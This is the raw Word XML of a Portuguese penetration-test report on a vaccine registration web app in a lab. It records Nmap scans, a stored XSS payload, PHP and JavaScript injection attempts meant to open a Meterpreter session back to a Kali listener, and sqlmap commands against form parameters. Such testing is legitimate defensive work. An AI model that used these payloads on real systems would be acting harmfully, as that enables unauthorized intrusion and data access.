        <w:t xml:space="preserve"> heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e por consequência não foi possível descobrir o no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>me do banco de dados utilizado pel</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o sistema.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945AD3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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00945AD3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945AD3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3.1 Análise do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 Exploração via</w:t>
      </w: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N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>map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 w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Objetivo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Após o problema de corrupção do sistema operacional do servidor de dados da aplicação, houve mudanças na arquitetura </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>do ambiente de testes. Então a máquina que hospeda a aplicação web também passou a hospedar a base de dados.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</w:rPr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TCP.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-sV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é utilizado para realizar o SYN e buscar a versão do software rodando no momento.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a serem usadas no teste, o delimitador é “-”.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IP_do_servidor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C65C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir as portas abertas TCP,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Pr="00892814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892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. A figura 14 mostra todas as portas escaneadas pelo Nmap.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4F40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noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18BC0260" wp14:editId="7FB3DA63">
            <wp:extent cx="5343525" cy="4074661"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="22" name="Imagem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7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4F40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color w:val="000000"/>
        </w:rPr>
        <w:t>Figura 14 - Portas TCP escaneadas pelo Nmap.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 w:firstLine="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF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 w:firstLine="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">[partes em vermelho </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="002C52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ncluir alguma referencia onde o conceito possa ser explicado]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92814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Pptp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Protocolo de Tunelamento Ponto a ponto.Utilizado para garantir segurança em redes wireless.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92814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>ms-wbt-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> = serviço de gerenciamento de hosts do windows.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de portas UDP.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-sU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indica o uso do detector de portas UDP.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indicará quais portas devem ser usadas no teste, o delimitador é “-”.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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Esperava-se descobrir as portas abertas UDP,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20"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00892814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892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste. A figura 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00892814">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostra todas as portas escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001247A7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1776" w:firstLine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31CE0D0A" wp14:editId="48D702E3">
            <wp:extent cx="5457825" cy="3690182"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="21" name="Imagem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9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4F40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color w:val="000000"/>
        </w:rPr>
        <w:t>Figura 15 – Portas UDP escaneadas pelo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="004F40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4F40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3.2 XSS – Cadastro L</w:t>
      </w:r>
      <w:r w:rsidRPr="004F40AA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23/04/16.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10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Descobrir se os campos da tela de Cadastro Lotes de Vacinas são vulneráveis ao ataque XSS Armazenado. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Foi esperado que a aplicação tratasse todos os dados inseridos nos campos para evitar que códigos maliciosos pudessem ser inseridos na base de dados.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0"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Inserir em um dos campos o seguinte código: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&lt;script&gt; alert(“oi”);&lt;/script&gt; no campo Marca/Fabricante.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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Caso a aplicação não realizasse um tratamento adequado dos dados inseridos, ao serem carregados pelo banco de dados, esses dados deveriam produzir um pop-up com o texto “oi”.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Cs/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não passou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Foi constatado que a aplicação não está fazendo o tratamento adequado para a inserção de códigos mal intencionados nos campos da tela em questão.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7B969886" wp14:editId="5B66599E">
            <wp:extent cx="5599155" cy="4143375"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="20" name="Imagem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15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16</w:t>
      </w:r>
      <w:r w:rsidRPr="00F248C0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado teste XSS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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>A partir da máquina virtual que usa o Kali Linux, abrir uma conexão do Sistema de Vacinas fazendo uso de um listener da ferramenta Metasploit para acessar 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 utilizados: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1. Utilizar o Metasploit para abrir um listener na porta 444 da máquina virtual onde o Kali Linux está hospedado, usando o exploit disponível em Auxiliary/Multi/Handler;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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 2. Usar um comando GET de Javascript para abrir a conexão da máquina que hospeda o Sistema de Vacinas com a máquina virtual do Kali na porta indicada</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE08B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="cyan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Comando a ser utilizado no XSS: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&lt;?php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$curl = curl_init('http://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curl_exec($curl);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AE0F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Caso não haja o devido tratamento, o  listener do Metasploit aberto na porta 444 deve criar uma conexão entre a máquina que </w:t>
      </w:r>
      <w:r w:rsidR="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">acessa </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a aplicação no momento e a máquina onde está o Kali Linux. O esperado é que existisse algum mecanismo na aplicação para impedir a tentativa.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B67E48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8A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0F26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> A sessão do Meterpreter não foi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color w:val="000000"/>
        </w:rPr>
        <w:t>Alterar o comando utilizado na tentativa 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tentar descobrir o que impediu a sessão do Meterpreter ser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&lt;?php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$curl = curl_init('http://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if(!curl_exec($curl)){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ab/>
        <w:t>javascript:alert(curl_error($curl));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}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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00BC19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Cs/>
          <w:color w:val="000000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/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tentativa 4</w:t>
      </w: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Ao contrário das demais tentativas que utilizavam códigos php, aqui foram utilizados códigos de Javascript puro, que os navegadores conseguem ler. O esperado é que a aplicação </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>realizasse algum tratamento para impedir o código de ser executado.</w:t>
      </w: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onsolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr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&lt;script&gt;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();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r.open(</w:t>
      </w:r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487697">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Não passou no teste.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00487697">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ndependente da sessão do Meterpreter não ser aberta, o código conseguiu ser inserido e executado.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2719E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 xml:space="preserve">3.4 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Tela Cadastro </w:t>
      </w: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>Lotes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 – Exploração via SQL Injection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22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realizar consultas não autorizadas no banco de dados por meio da injeção de SQL nos campos da tela de Cadastro Lotes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Descobrir se o campo Marca/Fabricante é vulnerável a SQL Injection através das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Comando: 1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uso de aspas simples aqui é o teste mais básico de vulnerabilidade de um campo para SQL Injection. Imagina-se que haja por baixo uma instrução SQL que possua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where param1 = &lt;parametro_na_interface&gt; and …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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Caso a aplicação não fizesse o devido tratamento do comando inserido e a instrução fosse ser modificada para </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">where param1  = 1 ‘ . </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O que ocasionaria um erro de SQL.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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou no teste.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colocando 1‘ no</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> campo </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Marca/Fabricante</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000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a ferramenta Sqlmap para realizar a tentativa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Salvar a requisição POST capturada pela ferramenta Burp Suite em um arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>a parte para ser utilizado pelo Sqlmap posteriormente.[2]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sqlmap -r params -p --current-db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params.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“--current-db” solicita que o Sqlmap que tente descobrir qual o banco da aplicação alvo.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Erro na ferramenta. </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O Sqlmap não reconhece o parâmetro, que está no arquivo indicado no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3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 Tentativa 2</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro solicitado pela ferramenta.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O comando do Sqlm</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ap pede que seja informado um parâmetro para possível injeção</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> de SQL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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: sqlmap -r params -p descricao --current-db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“descrição” é o parâmetro que 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“--current-db” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>comando utilizado para</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> descobrir qual o banco da aplicação alvo.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="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>. O parâmetro escolhido para teste de injeção SQL não é injetável conforme mostra a figura 17.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"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR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  <w:r w:rsidRPr="003A39F6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0088F5DE" wp14:editId="214CF59B">
            <wp:extent cx="5074770" cy="3882199"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="19" name="Imagem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722" cy="388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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 17 – Resultado aplicação SQL Injection via Sqlmap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4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tentativas anteriores</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>validade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  <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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Tentar </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">injeção </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>de SQL n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>o parâmetro “validade”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validade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“validade” é o parâmetro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que 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594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: </w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r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18.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2076F861" wp14:editId="0F2361A4">
            <wp:extent cx="5543550" cy="4325085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Imagem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3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536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0536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 18- Resultado exploração Sql Inejction via Sqlmap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5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tentativas anteriores</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="000536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t>“vacina”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</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Foi esperado que a aplicação fizesse o devido tratamento dos parâmetros.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="008C6DC7" w:rsidP="00594AD8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vacina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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: sqlmap –r params –p vacina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“–r“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0536AA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“-p”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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“vacina”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19.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5B659BD8" wp14:editId="641885B2">
            <wp:extent cx="5562600" cy="4229797"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Imagem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2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536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0536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 19 – Resultado exploração Sql Injection via Sqlmap.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6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tentativas anteriores </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">para incluir 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cadastro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cadastro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 w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p cadastro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params.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“cadastro”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0536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20.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1BCDE61E" wp14:editId="4501C851">
            <wp:extent cx="5524500" cy="4221901"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="16" name="Imagem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2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536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0536AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 20 – Resultado exploração Sql Injection via Sqlmap.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7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tentativas anteriores </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para incluir o par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>â</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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ok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O comando “-r” indica ao progr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ama que as instruções do ataque devem ser</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB70B5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in</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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“ok”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DB70B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21.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706EA6D6" wp14:editId="600350A8">
            <wp:extent cx="5429250" cy="4076477"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="15" name="Imagem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DB70B5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DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 21 – Resultado exploração Sql Injection via Sqlmap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6635A8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3.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="006635A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Consulta Servidor -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dia 18/04/16.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1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</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 40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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Submeter entradas maliciosas no sistema através de injeção de códigos SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> na página de Consulta Servidor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</w:rPr>
        <w:t>na tentativa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.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1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Verificar se o campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006635A8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 xml:space="preserve"> é vulnerável à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3456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Entrada:</w:t>
